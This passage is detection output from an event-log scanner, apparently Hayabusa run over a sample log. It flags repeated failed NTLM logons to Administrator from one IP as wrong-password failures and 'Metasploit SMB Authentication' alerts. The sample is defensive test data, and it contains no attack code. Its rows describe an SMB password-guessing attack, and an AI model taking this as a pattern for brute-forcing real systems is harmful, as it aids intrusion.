Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 